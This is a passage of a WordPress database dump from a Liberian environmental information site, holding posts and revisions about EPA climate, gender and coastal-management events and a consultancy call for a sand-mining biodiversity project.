08:27:50','',5807,'https://ekmsliberia.info/?p=5810',0,'revision','',0),(5811,38,'2026-03-09 08:31:29','0000-00-00 00:00:00','<!-- wp:paragraph -->\n<p>Monrovia, March 3, 2026_The Environmental Protection Agency (EPA) of Liberia has begun a two-day working session aimed at strengthening the integration of gender into Liberia’s Integrated Coastal Zone Management (ICZM) and Sustainable and Resilient Development Implementation (SRDIM) Plans.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The session is taking place at the Stella Maris Polytechnic, Blue and Green Room, in Sinkor, Monrovia, from March 3–4, 2026. It brings together government officials, development partners, donors, civil society organizations, and other stakeholders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Delivering the opening remarks on behalf of the Agency, the Deputy Executive Director for Administration, Mr. Anthony S. Kollie, welcomed participants and thanked partners for their support.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said the engagement is being held under the “Resilient Livelihoods and Inclusive Adaptation for Liberia (RESILIA Liberia)” initiative.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Mr. Kollie, Liberia is already experiencing the effects of climate change. He mentioned rising sea levels and coastal erosion in Monrovia and other coastal counties, irregular rainfall, flooding, and long dry seasons.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“These changes are affecting our people’s livelihoods, food security, and basic services,” he said. “Rural communities, indigenous people, women, and young people are among those most at risk because they depend heavily on climate-sensitive resources.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Kollie explained that through the RESILIA Liberia initiative, and with support from the Adaptation Fund, Liberia is working to expand practical, community-based adaptation solutions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said these solutions include resilient farming methods such as agroforestry and crop diversification, restoring degraded land, and improving important infrastructure and services. These include water systems, storage, and processing facilities to make adaptation efforts real and effective at the local level.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He stressed that the initiative places communities at the center of decision-making. The goal, he said, is not only to help Liberians cope with climate change but also to create green and climate-resilient jobs that will help citizens build better futures.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This working session is an important step in turning Liberia’s National Adaptation Plan and Nationally Determined Contribution into real actions at the county level,” Mr. Kollie noted.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He encouraged participants to actively take part in discussions, share experiences, and build strong networks that will continue even after the project funding ends.</p>\n<!-- /wp:paragraph -->','EPA Leads National Effort to Integrate Gender into Climate and Coastal Plans','','draft','open','open','','','','','2026-03-09 08:31:29','2026-03-09 08:31:29','',0,'https://ekmsliberia.info/?p=5811',25,'post','',0),(5812,38,'2026-03-27 08:52:37','2026-03-27 08:52:37','<strong>Project Background</strong>\r\n\r\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity- friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe project (GEFID 12029), to be executed by the Environmental Protection Agency of Liberia, the National Environmental Agency of The Gambia, and UNEP’s Industry and Economy Division, is currently in its Project Preparation Grant (PPG) phase (December 2025–August 2026). The PPG process is supporting detailed baseline assessments, stakeholder consultations, spatial and market analyses, and the preparation of the CEO Endorsement Request package to ensure a technically robust, inclusive, and nationally aligned full proposal for submission to the GBFF.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\nClick to: <a href=\"https://ekmsliberia.info/wp-content/uploads/2026/03/Gender-and-Social-Inclusion-Expert-27.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Call for Expression of Interest to provide Short-Term Consultancy/Technical Support: Consultancy Type & Title: National Consultant – Stakeholder, Gender and Social Inclusion Expert','','publish','closed','closed','','call-for-expression-of-interest-to-provide-short-term-consultancy-technical-support-consultancy-type-title-national-consultant-stakeholder-gender-and-social-inclusion-expert','','','2026-03-27 15:00:55','2026-03-27 15:00:55','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5812',10,'ekms_bulletin','',0),(5813,38,'2026-03-10 08:51:38','2026-03-10 08:51:38','<strong>Project Background</strong>\r\n\r\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity- friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe project (GEFID 12029), to be executed by the Environmental Protection Agency of Liberia, the National Environmental Agency of The Gambia, and UNEP’s Industry and Economy Division, is currently in its Project Preparation Grant (PPG) phase (December 2025–August 2026). The PPG process is supporting detailed baseline assessments, stakeholder consultations, spatial and market analyses, and the preparation of the CEO Endorsement Request package to ensure a technically robust, inclusive, and nationally aligned full proposal for submission to the GBFF.\r\n\r\n</div>\r\n</div>\r\n</div>','Call for Expression of Interest to provide Short-Term Consultancy/Technical Support: Consultancy Type & Title: National Consultant – Stakeholder, Gender and Social Inclusion Expert','','inherit','closed','closed','','5812-revision-v1','','','2026-03-10 08:51:38','2026-03-10 08:51:38','',5812,'https://ekmsliberia.info/?p=5813',0,'revision','',0),(5814,38,'2026-03-10 08:52:13','2026-03-10 08:52:13','','Stakeholder, Gender and Social Inclusion Expert (1)','','inherit','open','closed','','stakeholder-gender-and-social-inclusion-expert-1','','','2026-03-10 08:52:13','2026-03-10 08:52:13','',0,'https://ekmsliberia.info/wp-content/uploads/2026/03/Stakeholder-Gender-and-Social-Inclusion-Expert-1.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5815,38,'2026-03-10 08:54:01','2026-03-10 08:54:01','<strong>Project Background</strong>\r\n\r\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity- friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe project (GEFID 12029), to be executed by the Environmental Protection Agency of Liberia, the National Environmental Agency of The Gambia, and UNEP’s Industry and Economy Division, is currently in its Project Preparation Grant (PPG) phase (December 2025–August 2026). The PPG process is supporting detailed baseline assessments, stakeholder consultations, spatial and market analyses, and the preparation of the CEO Endorsement Request package to ensure a technically robust, inclusive, and nationally aligned full proposal for submission to the GBFF.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\nClick to: <a href=\"https://ekmsliberia.info/wp-content/uploads/2026/03/Stakeholder-Gender-and-Social-Inclusion-Expert-1.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Call for Expression of Interest to provide Short-Term Consultancy/Technical Support: Consultancy Type & Title: National Consultant – Stakeholder, Gender and Social Inclusion Expert','','inherit','closed','closed','','5812-revision-v1','','','2026-03-10 08:54:01','2026-03-10 08:54:01','',5812,'https://ekmsliberia.info/?p=5815',0,'revision','',0),(5816,38,'2026-03-10 09:04:58','2026-03-10 09:04:58','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) has urged the National Elections Commission (NEC) to establish an Environmental Unit within the NEC to guide and support environmentally friendly election planning nationwide.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The recommendation was made on Monday, March 9, 2026, when NEC officials visited EPA headquarters in Monrovia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5818,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2026/03/today-new1-1024x768.jpg\" alt=\"\" class=\"wp-image-5818\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>During the visit, EPA Executive Director Dr. Emmanuel K. Urey Yarkpawolo welcomed the NEC delegation and emphasized the importance of safeguarding the environment during national activities, including elections. He noted that campaign materials, posters, and other election supplies generate waste that must be managed properly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo said that creating an Environmental Unit at the NEC would help integrate environmental considerations into election planning and execution.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As part of the visit, NEC delegates toured EPA laboratory facilities and learned about the Agency’s work in environmental monitoring and protection.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The visit brought together NEC Board of Commissioners, the NEC Executive Director, the EPA Deputy Executive Director for Administration, Chief Technical Advisor, and other technical consultants.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For her part, NEC Chairperson Madam Davidetta Browne Lansanah thanked the EPA for the warm reception and praised the Agency’s work in protecting Liberia’s environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She expressed the Commission’s interest in collaborating closely with the EPA during upcoming elections.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The visit strengthened cooperation between the EPA and NEC as both institutions look to promote responsible and environmentally friendly electoral processes in Liberia, with the NEC signaling its intent to review the Environmental Unit proposal and engage further with the EPA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','EPA Urges NEC to Establish Environmental Unit to Green Liberia’s Elections','','publish','open','open','','epa-urges-nec-to-establish-environmental-unit-to-green-liberias-elections','','','2026-03-10 09:05:02','2026-03-10 09:05:02','',0,'https://ekmsliberia.info/?p=5816',24,'post','',0),(5844,38,'2026-03-27 01:40:41','2026-03-27 01:40:41','<!-- wp:paragraph -->\n<p>At the United Nations Headquarters, Liberia has warned that climate change is no longer just an environmental issue but a serious threat to peace and security.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Delivering Liberia’s national statement on March 26, 2026, the Executive Director of the Environmental Protection Agency, Dr. Emmanuel K. Urey Yarkpawolo, told members of the Group of Friends on Climate &amp; Security that the country is already feeling the impact.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said rising sea levels and strong coastal erosion are forcing many people from their homes. According to him, this situation is affecting livelihoods and creating tension in communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This is not only an environmental problem. It is now a human security issue,” Dr. Yarkpawolo said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that people who lose their homes and land often move to other areas, leading to disputes over land and resources. These tensions, he noted, can grow into bigger conflicts if not handled well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo also spoke about the wider region, especially the Sahel, where long dry seasons and poor farming conditions are pushing young men to move south in search of better life. He named countries like Burkina Faso as places where many migrants are coming from.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said some of these migrants are entering forest areas in Liberia to farm crops like cocoa. While this helps them survive, it is putting more pressure on land and forests and sometimes causes problems with local communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The risk of conflict is growing quietly,” he warned.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite the challenges, the EPA boss said Liberia is working to address the problem. He spoke about programs that are helping young people find jobs while protecting the environment. These include eco-brigades, mangrove restoration, and community peace efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said these actions are helping to reduce tension and build trust among people.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia is also trying to connect climate work with peacebuilding. Dr. Yarkpawolo said projects on the coast now include building protection, restoring nature, and supporting local people at the same time.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He called on the international community to support countries like Liberia with funding and technical help. He said climate finance and strong partnerships are needed to prevent future conflicts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We cannot talk about climate change without talking about security,” he said. “And we cannot have peace without dealing with climate problems.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo added that Liberia is ready to work with partners to turn climate challenges into opportunities for peace and development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','\"Climate Crisis Becoming Security Threat in Liberia\"…Director Yarkpawolo tells UN','','publish','open','open','','climate-crisis-becoming-security-threat-in-liberiadirector-yarkpawolo-tells-un','','','2026-03-27 01:40:43','2026-03-27 01:40:43','',0,'https://ekmsliberia.info/?p=5844',22,'post','',0),(5818,38,'2026-03-10 09:01:32','2026-03-10 09:01:32','','today new1','','inherit','open','closed','','today-new1','','','2026-03-10 09:01:32','2026-03-10 09:01:32','',5816,'https://ekmsliberia.info/wp-content/uploads/2026/03/today-new1.jpg',0,'attachment','image/jpeg',0),(5819,38,'2026-03-10 09:02:02','2026-03-10 09:02:02','','today new','','inherit','open','closed','','today-new','','','2026-03-10 09:02:02','2026-03-10 09:02:02','',5816,'https://ekmsliberia.info/wp-content/uploads/2026/03/today-new.jpg',0,'attachment','image/jpeg',0),(5820,38,'2026-03-10 09:04:58','2026-03-10 09:04:58','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) has urged the National Elections Commission (NEC) to establish an Environmental Unit within the NEC to guide and support environmentally friendly election planning nationwide.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The recommendation was made on Monday, March 9, 2026, when NEC officials visited EPA headquarters in Monrovia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5818,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2026/03/today-new1-1024x768.jpg\" alt=\"\" class=\"wp-image-5818\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>During the visit, EPA Executive Director Dr. Emmanuel K. Urey Yarkpawolo welcomed the NEC delegation and emphasized the importance of safeguarding the environment during national activities, including elections. He noted that campaign materials, posters, and other election supplies generate waste that must be managed properly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo said that creating an Environmental Unit at the NEC would help integrate environmental considerations into election planning and execution.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As part of the visit, NEC delegates toured EPA laboratory facilities and learned about the Agency’s work in environmental monitoring and protection.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The visit brought together NEC Board of Commissioners, the NEC Executive Director, the EPA Deputy Executive Director for Administration, Chief Technical Advisor, and other technical consultants.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For her part, NEC Chairperson Madam Davidetta Browne Lansanah thanked the EPA for the warm reception and praised the Agency’s work in protecting Liberia’s environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She expressed the Commission’s interest in collaborating closely with the EPA during upcoming elections.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The visit strengthened cooperation between the EPA and NEC as both institutions look to promote responsible and environmentally friendly electoral processes in Liberia, with the NEC signaling its intent to review the Environmental Unit proposal and engage further with the EPA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','EPA Urges NEC to Establish Environmental Unit to Green Liberia’s Elections','','inherit','closed','closed','','5816-revision-v1','','','2026-03-10 09:04:58','2026-03-10 09:04:58','',5816,'https://ekmsliberia.info/?p=5820',0,'revision','',0),(5821,38,'2026-03-10 09:07:38','2026-03-10 09:07:38','<!-- wp:paragraph -->\n<p>Buchanan, Grand Bassa County – March 4, 2026 – The Environmental Protection Agency of Liberia, in partnership with UN Women, United Nations Development Programme, and the Ministry of Gender, Children and Social Protection, today launched a two-day National Policy Dialogue aimed at linking the care economy with climate action under Liberia’s Revised Nationally Determined Contribution (NDC 3.0).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The event brought together about 59 participants from government ministries and agencies, civil society organizations, youth groups, rural women groups, private sector institutions, development partners, and the media.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The dialogue focuses on how climate change is increasing unpaid care work, especially for women and girls, and how national climate investments can reduce that burden while promoting economic growth.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia’s NDC 3.0 aims to reduce greenhouse gas emissions by 64 percent by 2035. It also plans to allocate 20 percent of climate finance to women-led groups and smallholder farmers. Participants discussed how climate investments such as solar-powered water systems, clean cooking solutions, climate-smart agriculture, and community care centers can reduce care work and support economic growth at the same time.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representing EPA Executive Director Dr. Emmanuel K. Urey Yarkpawolo, Mr. Benjamin Karmohn, Chief Technical Advisor to the Executive Director, thanked partners and participants for supporting the initiative.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He described climate change as a serious national concern that requires strong and inclusive action. According to him, Liberia’s NDC 3.0 sets a target to reduce greenhouse gas emissions by 64 percent by 2035, but the success of the plan depends on how well it includes women, youth, and vulnerable communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He stressed that climate policies must address the daily realities of Liberian families. He noted that flooding, drought, and environmental degradation are increasing the work women and girls do at home, especially in collecting water, gathering firewood, and caring for children and the elderly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Climate change is not just about emissions. It is about people and how they live,” he said. “If our climate investments do not reduce the burden on women and families, then we are not fully solving the problem.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Karmohn urged participants to use the dialogue to produce clear policy recommendations and practical steps that will guide the integration of care priorities into the NDC 3.0 Investment Plan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Yemi Falayajo, Deputy Country Representative of UN Women, thanked the Government of Liberia for creating space for such an important discussion.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She explained that women already carry a heavy burden of unpaid care work, and climate change is making the situation worse. She pointed out that when communities face floods or drought, it is often women and girls who walk longer distances for water and firewood or stay home to care for sick family members.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Investing in care systems is not a cost, it is an investment in our economy,” she said. “When women spend less time on unpaid work, they have more time for education, business, and leadership.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She encouraged participants to focus on practical solutions such as solar-powered water systems, clean cooking technologies, climate-smart agriculture, and community care centers. According to her, these solutions can reduce women’s time poverty while also supporting climate goals.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representing the British Embassy near Monrovia, Deputy British Ambassador Madam Joanna Markbreiter reaffirmed the United Kingdom’s support to Liberia’s climate and gender priorities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She stressed that climate action must be fair and inclusive. She noted that women and vulnerable groups are often the most affected by climate change but receive the least support.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Climate finance must reach the people who need it most,” she said. “Strong partnerships and accountability will ensure that resources bring real change in communities.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She praised Liberia for taking steps to integrate gender into its climate plans and encouraged continued collaboration among government, partners, and civil society.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Atty. Salimatu Gilayeneh, representing the United Nations Development Programme, highlighted Liberia’s commitment under NDC 3.0.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She said integrating care into the NDC Investment Plan will make climate action stronger and more effective. According to her, climate policies that consider social issues such as unpaid care work are more realistic and impactful.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We must design policies that respond to the real challenges people face every day,” she said. “Clear recommendations and actions from this dialogue will help move from discussion to implementation.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Hon. Curtis V. Dorley, Deputy Minister for Research, Policy and Planning at the Ministry of Gender, Children and Social Protection, delivered remarks on behalf of Minister Gbeme Horace Kollie.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He thanked the EPA for always ensuring that gender issues are included in national programs. He said the workshop is very important because climate change and environmental degradation are increasing women’s and girls’ unpaid care and domestic work.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He reminded participants that the climate crisis does not affect everyone equally. According to him, women and girls are highly dependent on natural resources for food, water, and firewood, making them more vulnerable to climate shocks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Climate policy that ignores gender equality is not only unjust, it is ineffective,” Hon. Dorley said. “Women and girls are on the frontlines of climate change and must be part of the solutions.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also repeated recommendations he made during the NDC 3.0 development process in 2025. These include introducing climate change education into school curriculum at all levels, providing scholarships for women and girls in natural resource management, offering economic empowerment training for rural and urban women, and creating specialized training opportunities for persons with disabilities, including albino groups.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He further called for better access to climate information in local languages and stronger gender-responsive social protection systems.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Encouraging open participation, he told attendees, “Speak now or forever hold your peace. This is the time to shape policies that will affect our people.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representing Grand Bassa County Superintendent Karyou Johnson, Mr. Zuu Menyon welcomed participants to Buchanan and thanked the organizers for selecting the county to host the dialogue.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said Grand Bassa, as one of Liberia’s historic counties, is ready to support national climate efforts. He noted that climate change is already affecting communities in the county, especially coastal areas where flooding and erosion are serious concerns.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Our people are feeling the impact,” he said. “We must work together to ensure that the decisions made here bring real benefits to women, youth, and families.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The dialogue continues as stakeholders seek to strengthen Liberia’s climate response while promoting gender equality and building an inclusive green economy.</p>\n<!-- /wp:paragraph -->','EPA, Partners Launch National Dialogue on Care and Climate in Buchanan','','publish','open','open','','epa-partners-launch-national-dialogue-on-care-and-climate-in-buchanan','','','2026-03-10 09:07:41','2026-03-10 09:07:41','',0,'https://ekmsliberia.info/?p=5821',23,'post','',0),(5822,38,'2026-03-10 09:07:10','2026-03-10 09:07:10','','today 1','','inherit','open','closed','','today-1','','','2026-03-10 09:07:10','2026-03-10 09:07:10','',5821,'https://ekmsliberia.info/wp-content/uploads/2026/03/today-1.jpg',0,'attachment','image/jpeg',0),(5823,38,'2026-03-10 09:07:38','2026-03-10 09:07:38','<!-- wp:paragraph -->\n<p>Buchanan, Grand Bassa County – March 4, 2026 – The Environmental Protection Agency of Liberia, in partnership with UN Women, United Nations Development Programme, and the Ministry of Gender, Children and Social Protection, today launched a two-day National Policy Dialogue aimed at linking the care economy with climate action under Liberia’s Revised Nationally Determined Contribution (NDC 3.0).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The event brought together about 59 participants from government ministries and agencies, civil society organizations, youth groups, rural women groups, private sector institutions, development partners, and the media.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The dialogue focuses on how climate change is increasing unpaid care work, especially for women and girls, and how national climate investments can reduce that burden while promoting economic growth.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia’s NDC 3.0 aims to reduce greenhouse gas emissions by 64 percent by 2035. It also plans to allocate 20 percent of climate finance to women-led groups and smallholder farmers. Participants discussed how climate investments such as solar-powered water systems, clean cooking solutions, climate-smart agriculture, and community care centers can reduce care work and support economic growth at the same time.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representing EPA Executive Director Dr. Emmanuel K. Urey Yarkpawolo, Mr. Benjamin Karmohn, Chief Technical Advisor to the Executive Director, thanked partners and participants for supporting the initiative.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He described climate change as a serious national concern that requires strong and inclusive action. According to him, Liberia’s NDC 3.0 sets a target to reduce greenhouse gas emissions by 64 percent by 2035, but the success of the plan depends on how well it includes women, youth, and vulnerable communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He stressed that climate policies must address the daily realities of Liberian families. He noted that flooding, drought, and environmental degradation are increasing the work women and girls do at home, especially in collecting water, gathering firewood, and caring for children and the elderly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Climate change is not just about emissions. It is about people and how they live,” he said. “If our climate investments do not reduce the burden on women and families, then we are not fully solving the problem.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Karmohn urged participants to use the dialogue to produce clear policy recommendations and practical steps that will guide the integration of care priorities into the NDC 3.0 Investment Plan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Yemi Falayajo, Deputy Country Representative of UN Women, thanked the Government of Liberia for creating space for such an important discussion.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She explained that women already carry a heavy burden of unpaid care work, and climate change is making the situation worse. She pointed out that when communities face floods or drought, it is often women and girls who walk longer distances for water and firewood or stay home to care for sick family members.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Investing in care systems is not a cost, it is an investment in our economy,” she said. “When women spend less time on unpaid work, they have more time for education, business, and leadership.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She encouraged participants to focus on practical solutions such as solar-powered water systems, clean cooking technologies, climate-smart agriculture, and community care centers. According to her, these solutions can reduce women’s time poverty while also supporting climate goals.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representing the British Embassy near Monrovia, Deputy British Ambassador Madam Joanna Markbreiter reaffirmed the United Kingdom’s support to Liberia’s climate and gender priorities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She stressed that climate action must be fair and inclusive. She noted that women and vulnerable groups are often the most affected by climate change but receive the least support.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Climate finance must reach the people who need it most,” she said. “Strong partnerships and accountability will ensure that resources bring real change in communities.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She praised Liberia for taking steps to integrate gender into its climate plans and encouraged continued collaboration among government, partners, and civil society.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Atty. Salimatu Gilayeneh, representing the United Nations Development Programme, highlighted Liberia’s commitment under NDC 3.0.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She said integrating care into the NDC Investment Plan will make climate action stronger and more effective. According to her, climate policies that consider social issues such as unpaid care work are more realistic and impactful.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We must design policies that respond to the real challenges people face every day,” she said. “Clear recommendations and actions from this dialogue will help move from discussion to implementation.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Hon. Curtis V. Dorley, Deputy Minister for Research, Policy and Planning at the Ministry of Gender, Children and Social Protection, delivered 